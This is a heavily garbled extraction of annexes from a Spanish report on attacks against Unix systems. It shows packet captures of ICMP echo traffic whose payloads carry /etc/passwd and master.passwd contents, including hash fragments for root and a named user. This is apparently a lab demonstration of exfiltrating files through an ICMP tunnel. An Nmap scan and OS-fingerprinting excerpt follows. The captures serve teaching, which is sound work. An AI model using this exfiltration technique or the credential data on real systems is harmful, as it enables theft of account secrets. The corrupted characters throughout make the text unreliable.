Brame 1) 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D67ff -!orre!t0 87entifier: 0D1)1( .equen!e number: (0+) 90D0)00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(6+6D61696,(0++65666175... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 61 70 (f 6e +( 75 0a 0! 9+ 1e 63 75 6f 73 6+ 69 73 70 (9 7+ 00 6b 6! 6f 6( 3a 6e 7( e1 +0 00 6+ 7+ 6! 69 (a 6+ (f a( 00 67 6f (0 (f 6e 3a (0 73 (6 00 ff 6f 55 67 (f 35 53 6( 00 +0 1) 7( 73 71 6e 33 61 69 17 01 1( 6+ 65 75 6f 3a 6e 6e 31 )+ 0) 67 7( 65 6! 35 6+ (f 96 b) 00 61 3a 75 6f 33 6( 6e 5b !0 63 69 (f 65 67 3a 6f 6f 1f a) 6! 6! 76 3a 69 3a 7) 6! 0) 00 61 (0 61 (f 6e 30 3a 6f 00 0( 76 ++ 7( 75 0a 3a (f 67 +5 !0 65 65 (f 73 6( 30 3a 69 00 a) 6( 66 73 7( 69 3a (f 6e ..:..e..1.-...<. ..tI..I......... ....m.....!"a@eb a!67oor7mai" Def au"t K er:;@ar; poo";mqueue:;u r ; bin;no"ogin.bi n7:Q:53:53::0:0: Cin7 .an7boD:;:; u r; bin;no"ogin .p

Brame 19 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D9(5b -!orre!t0 87entifier: 0D1)1( .equen!e number: (30+ 90D0900: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(6B7)793#(#3#363(3#36... 0000 0010 00(0 0030 00+0 0050 0060 0070 00 00 00 61 3a +6 65 (f 17 9+ 0( 63 36 69 7( 75 31 a7 0) 6b 3( 6! 3a 73 96 e7 00 6+ 3a 7+ (f 7( 5b 00 9( 6f 3a 65 6e (f 1f 00 5b 6f 30 7( 6f 73 00 +0 1) 7( 3a (0 6e 6( 0! 01 1( 7( 30 70 65 69 (9 +b 09 6f 3a 73 7) 6e e1 0b 00 7) 50 65 69 (f a( !0 63 79 61 75 73 6e (6 a) 6! 3a 63 6+ 7+ 6f 0) 00 61 (a 6b 6f 65 6! 00 1e 76 3a 65 (7 6e 6f +5 !0 65 36 7+ 75 7+ 67 00 a) 6( 3( (0 73 3a 69 ..1.-...:..e..<. ......I.5....... .....-....!"a@eb a!67oorroDE:Q:6( :6(::0:0:Pa!6et Bi"ter p eu7o-u er:;noneDi tent: ;u r; bin;no"ogi

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0+ de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


00)0 0090 00a0 6e 0a 5f 70 66 6! 6f 67 6+ 3a (a 3a 36 3+ 3a 36 3+ 3a 3a 30 3a 30 3a 70 66 6! 6f 67 6+ (0 70 7( 69 76 n.Apf"og7:Q:6+:6 +::0:0:pf"og7 pr i@

Brame (0 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D9a5b -!orre!t0 87entifier: 0D1)1( .equen!e number: (30+ 90D0900: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(6B7)793#(#3#363(3#36... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a +6 65 (f 6e 3+ 69 0! 9+ 1e 63 36 69 7( 75 0a 3a 76 (9 7+ 00 6b 3( 6! 3a 73 5f 3a e1 +1 00 6+ 3a 7+ (f 7( 70 30 a( 00 9a 6f 3a 65 6e (f 66 3a (6 00 5b 6f 30 7( 6f 73 6! 30 00 +0 1) 7( 3a (0 6e 6( 6f 3a 17 01 1( 7( 30 70 65 69 67 70 31 )+ 09 6f 3a 73 7) 6e 6+ 66 96 b7 00 7) 50 65 69 (f 3a 6! 5b !0 63 79 61 75 73 6e (a 6f 1f a) 6! 3a 63 6+ 7+ 6f 3a 67 0) 00 61 (a 6b 6f 65 6! 36 6+ 00 0( 76 3a 65 (7 6e 6f 3+ (0 +5 !0 65 36 7+ 75 7+ 67 3a 70 00 a) 6( 3( (0 73 3a 69 36 7( ..:..e..1.-...<. ..t#..I......... .....-....!"a@eb a!67oorroDE:Q:6( :6(::0:0:Pa!6et Bi"ter p eu7o-u er:;noneDi tent: ;u r; bin;no"ogi n.Apf"og7:Q:6+:6 +::0:0:pf"og7 pr i@

Brame (1 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D6()! -!orre!t0 87entifier: 0D1)1( .equen!e number: (560 90D0a00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(736570(07573657(3#(B76... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 (f 73 63 6+ 61 69 (a 17 9+ 0( 63 76 6( 70 6) 7( 6e 3a 31 bb 0) 6b 61 69 3a 63 (f (f 96 !7 00 6+ 7( 6e (a 70 65 6e 5b 00 6( 6f (f (f 3a (0 67 6f 1f 00 )! 6f 65 6e 36 70 70 6! 00 +0 1) 7( 67 6f 35 7( 7+ 6f 0! 01 1( 73 70 6! 3a 6f 79 67 (9 37 0a 65 7+ 6f 36 67 3a 69 e1 31 00 70 79 67 35 7( (f 6e a( !0 63 (0 3a 69 3a 61 75 0a (6 a) 6! 75 (f 6e 3a 67 73 75 0) 00 61 73 75 0a 30 73 7( 75 00 1e 76 65 73 5f 3a 3a (f 63 +5 !0 65 7( 7( 6+ 30 (f 73 70 00 a) 6( 3a (f 6) 3a 76 6( 3a ..1.-...:..e..<. ......I.11...... ....b.....!"a@eb a!67oor ep u er: ;@ar;emptE:;u r; bin;no"ogin.A7' !p:Q:65:65::0:0: 7'!p program :;@ ar;emptE:;u r; b in;no"ogin.uu!p: Q:

Brame (( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D6a)! -!orre!t0 87entifier: 0D1)1( .equen!e number: (560 90D0a00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(736570(07573657(3#(B76... 0000 0010 00(0 00 0! (9 e1 a( (6 00 17 31 96 5b 1f 0) 00 +5 00 00 9+ 7+ +( 00 00 +0 01 )+ b6 !0 a) 00 0( !0 a) 00 1e 00 00 6a )! 1) 1( 0a 00 63 6! 61 76 65 6( ..:..e..1.-...<. ..tC..I......... ....Y.....!"a@eb

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0O de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


0030 00+0 0050 0060 0070 00)0 0090 00a0 61 (f 73 63 6+ 61 69 (a 63 76 6( 70 6) 7( 6e 3a 6b 61 69 3a 63 (f (f 6+ 7( 6e (a 70 65 6e 6f (f (f 3a (0 67 6f 6f 65 6e 36 70 70 6! 7( 67 6f 35 7( 7+ 6f 73 70 6! 3a 6f 79 67 65 7+ 6f 36 67 3a 69 70 79 67 35 7( (f 6e (0 3a 69 3a 61 75 0a 75 (f 6e 3a 67 73 75 73 75 0a 30 73 7( 75 65 73 5f 3a 3a (f 63 7( 7( 6+ 30 (f 73 70 3a (f 6) 3a 76 6( 3a a!67oor ep u er: ;@ar;emptE:;u r; bin;no"ogin.A7' !p:Q:65:65::0:0: 7'!p program :;@ ar;emptE:;u r; b in;no"ogin.uu!p: Q:

Brame (3 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D59!e -!orre!t0 87entifier: 0D1)1( .equen!e number: ()16 90D0b00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(36363#36363#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 65 63 63 (f 3a 69 17 9+ 0( 63 3a 7( 70 61 75 36 63 31 (9 0) 6b 55 3a 70 6! 75 3a 96 07 00 6+ 55 (f 75 (f 63 3a 5b 00 59 6f +3 76 6( 6! 69 30 1f 00 !e 6f 50 61 6! 69 63 3a 00 +0 1) 7( (0 7( 69 6( 6f 30 0! 01 1( 36 70 (f 63 65 0a 3a (9 !f 0b 36 73 73 3a 7) 70 50 e1 f1 00 3a 65 70 (f 65 6f 6f a( !0 63 36 75 6f 75 63 70 73 (6 a) 6! 36 6+ 6f 73 (f 3a 7+ 0) 00 61 3a 6f 6! 7( 75 (a (0 00 1e 76 3a (7 (f (f 75 3a +f +5 !0 65 30 75 75 6! 63 36 66 00 a) 6( 3a 73 75 6f 70 3) 66 ..1.-...:..e..<. ..:...I......... ..../.....!"a@eb a!67oor66:66::0: 0:KK,P p eu7o-u er:;@ar; poo";uu !ppub"i!:;u r;"o !a";"ibeDe!;uu!p ;uu!i!o.pop:Q:6) :6::0:0:Po t Off i!

Brame (+ 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D61!e -!orre!t0 87entifier: 0D1)1( .equen!e number: ()16 90D0b00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(36363#36363#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 65 63 63 (f 3a 69 0! 9+ 1e 63 3a 7( 70 61 75 36 63 (9 7+ 00 6b 55 3a 70 6! 75 3a e1 +3 00 6+ 55 (f 75 (f 63 3a a( 00 61 6f +3 76 6( 6! 69 30 (6 00 !e 6f 50 61 6! 69 63 3a 00 +0 1) 7( (0 7( 69 6( 6f 30 17 01 1( 36 70 (f 63 65 0a 3a 31 )+ 0b 36 73 73 3a 7) 70 50 96 b5 00 3a 65 70 (f 65 6f 6f 5b !0 63 36 75 6f 75 63 70 73 1f a) 6! 36 6+ 6f 73 (f 3a 7+ 0) 00 61 3a 6f 6! 7( 75 (a (0 00 0( 76 3a (7 (f (f 75 3a +f +5 !0 65 30 75 75 6! 63 36 66 00 a) 6( 3a 73 75 6f 70 3) 66 ..:..e..1.-...<. ..t,..I......... ....a.....!"a@eb a!67oor66:66::0: 0:KK,P p eu7o-u er:;@ar; poo";uu !ppub"i!:;u r;"o !a";"ibeDe!;uu!p ;uu!i!o.pop:Q:6) :6::0:0:Po t Off i!

Brame (5 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0De)7e -!orre!t0 87entifier: 0D1)1( .equen!e number: 307( 90D0!00: Data 91(0 bEte :

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *00 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Data: 636,6176656(61636C6+6B6B7(65(0+B776<657(3#(B6<6B... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6e (f 77 6f 6e 3a 69 17 9+ 0( 63 6f 73 3a 7( 65 (f 6e 31 9a 0) 6b 6e 6( (a 6! 7( 75 96 (e 00 6+ 65 69 3a 6+ 3a 73 5b 00 e) 6f 7) 6e 3) (0 (f 7( 1f 00 7e 6f 69 (f 30 57 6e (f 00 +0 1) 7( 73 6e 3a 69 6f 73 0! 01 1( 65 7+ 6f 3) 6+ 6e 6( (9 5e 0! (0 65 6! 30 65 65 69 e1 !a 00 +f 6e 6f 3a (0 7) 6e a( !0 63 77 7+ 67 3a 57 69 (f (6 a) 6! 6e 3a 69 30 65 73 6e 0) 00 61 65 (f 6e 3a 6( 7+ 6f 00 1e 76 7( 75 0a 30 (0 65 6! +5 !0 65 3a 73 77 3a +f 6e 6f 00 a) 6( (f 7( 77 57 77 7+ 67 ..1.-...:..e..<. ......I.W....... .....d....!"a@eb a!67oore O>ner:; noneDi tent:;u r ; bin;no"ogin.>> >:Q:)0:)0::0:0:& or"7 &i7e &eb O> ner:;noneDi tent :;u r; bin;no"og in

Brame (6 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0Df07e -!orre!t0 87entifier: 0D1)1( .equen!e number: 307( 90D0!00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(65(0+B776<657(3#(B6<6B... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6e (f 77 6f 6e 3a 69 0! 9+ 1e 63 6f 73 3a 7( 65 (f 6e (9 7+ 00 6b 6e 6( (a 6! 7( 75 e1 ++ 00 6+ 65 69 3a 6+ 3a 73 a( 00 f0 6f 7) 6e 3) (0 (f 7( (6 00 7e 6f 69 (f 30 57 6e (f 00 +0 1) 7( 73 6e 3a 69 6f 73 17 01 1( 65 7+ 6f 3) 6+ 6e 6( 31 )+ 0! (0 65 6! 30 65 65 69 96 b+ 00 +f 6e 6f 3a (0 7) 6e 5b !0 63 77 7+ 67 3a 57 69 (f 1f a) 6! 6e 3a 69 30 65 73 6e 0) 00 61 65 (f 6e 3a 6( 7+ 6f 00 0( 76 7( 75 0a 30 (0 65 6! +5 !0 65 3a 73 77 3a +f 6e 6f 00 a) 6( (f 7( 77 57 77 7+ 67 ..:..e..1.-...<. ..tD..I......... .....d....!"a@eb a!67oore O>ner:; noneDi tent:;u r ; bin;no"ogin.>> >:Q:)0:)0::0:0:& or"7 &i7e &eb O> ner:;noneDi tent :;u r; bin;no"og in

Brame (7 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D(!17 -!orre!t0 87entifier: 0D1)1( .equen!e number: 33() 90D0700: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(0#6<6B6(6B6+793#(#3#36... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a 30 73 3a 69 5a 5) 17 9+ 0( 63 36 3a 65 (f 6e 51 +! 31 6f 0) 6b 35 55 7( 75 0a +( 96 99 00 6+ 35 6e 3a 73 67 37 5b 00 (! 6f 33 70 (f 7( 61 +b 1f 00 17 6f 3+ 7( 6e (f 7( 6+ 00 +0 1) 7( 3a 69 6f 73 63 (+ 0! 01 1( 0a 36 76 6e 6( 65 5) (9 )9 07 6e 35 69 65 69 6! 51 e1 5f 00 6f 35 6! 7) 6e 6f +5 a( !0 63 6( 33 65 69 (f 3a 3( (6 a) 6! 6f 3+ 67 73 6e (+ 77 0) 00 61 6+ 3a 65 7+ 6f 31 +7 00 1e 76 79 3a 6+ 65 6! (+ +7 +5 !0 65 3a 30 (0 6e 6f (f +( 00 a) 6( (a 3a 75 7+ 67 69 ++ ..1.-...:..e..<. ..o...I..A...... ....4.....!"a@eb a!67oor.nobo7E:Q :6553+:6553+::0: 0:Knpri@i"ege7 u er:;noneDi tent :;u r; bin;no"og in.mar!e"o:M1M;i URC757MGR<(>3HCD G2

Brame () 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E:

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.. de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


,o7e: 0 9: ,'e!6 um: 0D3+17 -!orre!t0 87entifier: 0D1)1( .equen!e number: 33() 90D0700: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(0#6<6B6(6B6+793#(#3#36... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a 30 73 3a 69 5a 5) 0! 9+ 1e 63 36 3a 65 (f 6e 51 +! (9 7+ 00 6b 35 55 7( 75 0a +( e1 +5 00 6+ 35 6e 3a 73 67 37 a( 00 3+ 6f 33 70 (f 7( 61 +b (6 00 17 6f 3+ 7( 6e (f 7( 6+ 00 +0 1) 7( 3a 69 6f 73 63 (+ 17 01 1( 0a 36 76 6e 6( 65 5) 31 )+ 07 6e 35 69 65 69 6! 51 96 b3 00 6f 35 6! 7) 6e 6f +5 5b !0 63 6( 33 65 69 (f 3a 3( 1f a) 6! 6f 3+ 67 73 6e (+ 77 0) 00 61 6+ 3a 65 7+ 6f 31 +7 00 0( 76 79 3a 6+ 65 6! (+ +7 +5 !0 65 3a 30 (0 6e 6f (f +( 00 a) 6( (a 3a 75 7+ 67 69 ++ ..:..e..1.-...<. ..t<..I......... ....+.....!"a@eb a!67oor.nobo7E:Q :6553+:6553+::0: 0:Knpri@i"ege7 u er:;noneDi tent :;u r; bin;no"og in.mar!e"o:M1M;i URC757MGR<(>3HCD G2

Brame (9 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D+!5) -!orre!t0 87entifier: 0D1)1( .equen!e number: 35)+ 90D0e00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(31(B6,6C516951+B5#(B... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 5a 30 6+ 6f (f 00 00 17 9+ 0( 63 (f 3a 65 3a 6( 00 00 31 !a 0) 6b 3a +7 7a (f 61 00 96 0) 00 6+ 31 61 3a 75 73 00 5b 00 +! 6f 30 7( (f 73 6) 00 1f 00 5) 6f 30 63 6) 7( 0a 00 00 +0 1) 7( 31 65 6f (f 00 00 0! 01 1( 7( 3a 6! 67 6! 00 00 (9 (e 0e 31 31 6f 65 6f 00 00 e1 f0 00 (f 30 (0 (f 63 00 00 a( !0 63 6! 30 +6 67 61 00 00 (6 a) 6! 6b 31 65 61 6! 00 00 0) 00 61 51 3a 7( 7( (f 00 00 00 1e 76 69 3a 6e 63 6( 00 00 +5 !0 65 51 30 61 65 69 00 00 00 a) 6( +f 3a 6e 6! 6e 00 00 ..1.-...:..e..<. ......I......... ....2G....!"a@eb a!67oorr1;"6RiRO U;:1001:1001::0: 0:3ar!e"o Bernan 7eO:;'ome;mar!e" o:;u r;"o!a";bin ;ba '........... ................ ..

Brame 30 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D5+5) -!orre!t0 87entifier: 0D1)1( .equen!e number: 35)+ 90D0e00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(31(B6,6C516951+B5#(B... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 5a 30 6+ 6f (f 00 00 0! 9+ 1e 63 (f 3a 65 3a 6( 00 00 (9 7+ 00 6b 3a +7 7a (f 61 00 e1 +6 00 6+ 31 61 3a 75 73 00 a( 00 5+ 6f 30 7( (f 73 6) 00 (6 00 5) 6f 30 63 6) 7( 0a 00 00 +0 1) 7( 31 65 6f (f 00 00 17 01 1( 7( 3a 6! 67 6! 00 00 31 )+ 0e 31 31 6f 65 6f 00 00 96 b( 00 (f 30 (0 (f 63 00 00 5b !0 63 6! 30 +6 67 61 00 00 1f a) 6! 6b 31 65 61 6! 00 00 0) 00 61 51 3a 7( 7( (f 00 00 00 0( 76 69 3a 6e 63 6( 00 00 +5 !0 65 51 30 61 65 69 00 00 00 a) 6( +f 3a 6e 6! 6e 00 00 ..:..e..1.-...<. ..tB..I......... ....TG....!"a@eb a!67oorr1;"6RiRO U;:1001:1001::0: 0:3ar!e"o Bernan 7eO:;'ome;mar!e" o:;u r;"o!a";bin ;ba '........... ................ ..

Brame 31 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.* de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D310+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 3)+0 90D0f00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((3(0(++67(6565+(53++3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 17 9+ 0( 63 3a (e 30 35 (3 30 +) 31 7a 0) 6b (0 70 30 36 0a 6! 96 0f 00 6+ 73 61 35 (0 7( (+ 5b 00 31 6f 7( 73 (f 6( 6f 50 1f 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 0! 01 1( (3 65 6+ (f 6f 3a 6( (9 1e 0f (0 7+ (! 30 6b (+ 37 e1 e9 00 (+ 63 76 36 73 31 57 a( !0 63 +6 (f (0 (0 (0 (+ 6+ (6 a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 1e 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..1.-...:..e..<. ......I......... ....1.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Brame 3( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D390+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 3)+0 90D0f00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((3(0(++67(6565+(53++3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 +7 00 6+ 73 61 35 (0 7( (+ a( 00 39 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 0f (0 7+ (! 30 6b (+ 37 96 b1 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..tH..I......... ....9.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.2 de 22O

Ane9o C. ( Ane9o C. Anlisis de una /ir a FC!&7!

Anexo /. Anlisis de una =irma T/4GI4


En este ane9o se "retende ostrar so era ente la anera de inter"retar una is a con los s en detalle en /ir a de un ,? cuando @ a" la desconoce# ' c8 o se relaciona la tests desarrollados en la "gina J0. Este "roceso se "uede ver este enlace% 'ttp:;;nmap.org;o
7ete!t;o 7ete!t-fingerprint-format.'tm"

2na vez que se intenta realizar una detecci8n de un ,? re oto con @ a"# es "robable que ste desconozca qu $a' Cdel otro ladoD ' devuelva co o resultado el CnuevoD /inger"rint. Esto "or eje "lo "uede suceder cuando no se dis"one de una versi8n u' actualizada de @ a" ' el ,? re oto es relativa ente
u7o .;nmap -@ -O 19(.16).0.30

nuevo. !or eje "lo ;n/asis agregado intencional ente>%


marcelo@saturno:~/src/nmap/bin$ .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-0+-0( 15:05 #$T 8nitiating #$P Ping .!an at 15:05 .!anning 19(.16).0.30 -1 port0 ,omp"ete7 #$P Ping .!an at 15:054 0.0( e"ap e7 91 tota" 'o t : 8nitiating ./N .tea"t' .!an at 15:05 .!anning !i!"on 919(.16).0.30: -171+ port 0 Di !o@ere7 open port ((;t!p on 19(.16).0.30 Di !o@ere7 open port 53;t!p on 19(.16).0.30 Di !o@ere7 open port (1;t!p on 19(.16).0.30 8n!rea ing en7 7e"aE for 19(.16).0.30 from 0 to 5 7ue to maDA u!!e fu"AtrEno in!rea e to + ,omp"ete7 ./N .tea"t' .!an at 15:054 13.+6 e"ap e7 9171+ tota" port : Initiating 4- detection !trD A1" against ciclon !192.168.0. 0" /etrDing 4- detection !trD A2" against ciclon !192.168.0. 0" /etrDing 4- detection !trD A " against ciclon !192.168.0. 0" /etrDing 4- detection !trD A." against ciclon !192.168.0. 0" /etrDing 4- detection !trD A1" against ciclon !192.168.0. 0" ?o t !i!"on 919(.16).0.30: appear to be up ... goo7. 8ntere ting port on !i!"on 919(.16).0.30:: Not 'o>n: 1711 !"o e7 port PO$T .T#T< .<$=8,< (1;t!p open ftp ((;t!p open ' 53;t!p open 7omain 3#, #77re : 00:0,:(9:<1:#(:(6 